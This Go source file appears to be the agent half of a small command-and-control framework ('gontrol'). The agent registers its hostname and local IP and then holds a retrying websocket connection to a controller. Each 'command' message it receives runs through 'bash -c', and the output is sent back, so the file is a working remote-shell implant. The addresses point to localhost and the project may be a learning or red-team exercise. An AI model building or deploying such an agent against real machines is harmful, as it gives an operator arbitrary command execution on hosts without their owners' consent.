package main

import (
	"encoding/json"
	"fmt"
	"log"
	"math"
	"math/rand"
	"net"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"strconv"
	"time"

	// "gontrol/src/logger"

	"github.com/gorilla/websocket"
)

const(
	webServerAddr 	= "127.0.0.1:3333"
	webSocketAddr   = "127.0.0.1:5555"
	registerURL = "http://" + webServerAddr + "/agents"
	// wsURL 		= "ws://" + webSocketAddr + "/data"
)

type Agent struct {
	AgentName 		string `json:"agentName"`
	AgentID         string `json:"agentId"`
	AgentType       string `json:"agentType"`
	AgentIP         string `json:"agentIp"`
	InitialContact 	string `json:"initialContact"`
	LastContact     string `json:"lastContact"`
	HostName        string `json:"hostName"`
}

type Message struct {
	Type 	string `json:"type"`
	Payload string `json:"payload"`
}

var conn *websocket.Conn

func registerAgent(agentName, agentId, agentIp, agentType, addPort string) error {

	form := url.Values{}
	form.Add("agentId", agentId)
	form.Add("agentName", agentName)
	form.Add("agentType", agentType)
	form.Add("IPv4Address", agentIp)
	form.Add("addPort", addPort)

	resp, err := http.PostForm(registerURL, form)
	if err != nil {
		return fmt.Errorf("Error registering agent: %v", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusCreated {
		return fmt.Errorf("Failed to register agent, status: %v", resp.Status)
	}

	log.Printf("Agent %s successfully registered.", agentName)
	 // append(logger.LogEntries, fmt.Sprintf("%s Agent successfully registered.", time.Now().Format(time.RFC3339)))
	return nil
}

func connectToWebSocket(agentName, agentId, agentIp, agentType, hostName string) error {
	wsURL := fmt.Sprintf("ws://%s/data?agentName=%s&agentId=%s&IPv4Address=%s&agentType=%s&hostname=%s", webSocketAddr, url.QueryEscape(agentName), url.QueryEscape(agentId), url.QueryEscape(agentIp), url.QueryEscape(agentType), url.QueryEscape(hostName))
	var err error
	for {
		conn, _, err = websocket.DefaultDialer.Dial(wsURL, nil)
		if err == nil {
			log.Println("WeSocket connection established")
			// logger.LogEntries = append(logger.LogEntries, fmt.Sprintf("%s websocket established", time.Now().Format(time.RFC3339)))
			return nil
		}

		log.Printf("Failed to connect to WebSocket: %v. Retrying in 5 seconds...", err)
		time.Sleep(5 * time.Second)
	}
}

func reconnectToWebSocket(agentName, agentId, agentIp, agentType, hostName string) error {
	backoff := 2 * time.Second
	maxBackoff := 1 * time.Minute

	for {
		log.Println("Attempting to reconnect to WebSocket...")
		err := connectToWebSocket(agentName, agentId, agentIp, agentType, hostName)
		if err == nil {
			log.Println("Reconnection succesful.")
			return nil
		}

		log.Printf("Reconnection failed: %v", err)

		time.Sleep(backoff)
		backoff *= 2
		if backoff > maxBackoff {
			backoff = maxBackoff
		}
	}
}

func listenForCommands(agentName, agentId, agentIp, agentType, hostName string) {
	defer conn.Close()

	for {
		_, rawMessage, err := conn.ReadMessage()
		if err != nil {
			log.Printf("Connection lost: %v", err)
			if reconnectErr := reconnectToWebSocket(agentName, agentId, agentIp, agentType, hostName); reconnectErr != nil {
				log.Printf("Critical error during reconnection: %v", reconnectErr)
				}
			continue
		}

		var message Message
		if err := json.Unmarshal(rawMessage, &message); err != nil {
			log.Printf("Error unmarshalling message: %v", err)
			continue
		}

		if message.Type != "command" {
			log.Printf("Ignoring non-command message: %v", message)
			continue
		}

		command := message.Payload
		log.Printf("Received command: %s", command)

		cmd := exec.Command("bash", "-c", command)
		output, err := cmd.CombinedOutput()

		response := Message{
			Type: "response",
			Payload: string(output),
		}

		if err != nil {
			response.Payload += fmt.Sprintf("\n Error executing command: %v", err)
		}

		responseBytes, _ := json.Marshal(response)
		if err := conn.WriteMessage(websocket.TextMessage, responseBytes); err != nil {
			log.Printf("Error sending output: %v", err)
			break
		}

		log.Printf("Output sent to server.")
	}
}

func randomInt(length int) int {
    rand.Seed(time.Now().UnixNano())
	min := int(math.Pow10(length-1))
	max := int(math.Pow10(length)) -1
	return rand.Intn(max-min+1) + min

}

func GetLocalIP() net.IP {
    addrs, err := net.InterfaceAddrs()
    if err != nil {
        log.Fatal(err)
    }
    for _, address := range addrs {
        if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
            if ipnet.IP.To4() != nil {
                return ipnet.IP
            }
        }
    }
    return nil
}

func GetLocalIPs() []net.IP {
    var ips []net.IP
    addrs, err := net.InterfaceAddrs()
    if err != nil {
       log.Fatal(err)
    }
    for _, address := range addrs {
        if ipnet, ok := address.(*net.IPNet); ok {
            if ipnet.IP.To4() != nil {
                ips = append(ips, ipnet.IP)
            }
        }
    }
    return ips
}

func main() {
	agentName := "Agent-001"
	agentId := strconv.Itoa(randomInt(5))
	agentIp := GetLocalIP().String()
	agentType := "BaseAgent"
	hostName, _ := os.Hostname()

	log.Printf("AgentId: %s", agentId)

	// if err := registerAgent(agentName, agentId, agentIp, agentType); err != nil {
	// 	log.Fatalf("Agent registration failed: %v", err)
	// }

	if err := connectToWebSocket(agentName, agentId, agentIp, agentType, hostName); err != nil {
		log.Fatalf("Websocket connection failed: %v", err)
	}

	listenForCommands(agentName, agentId, agentIp, agentType, hostName)
}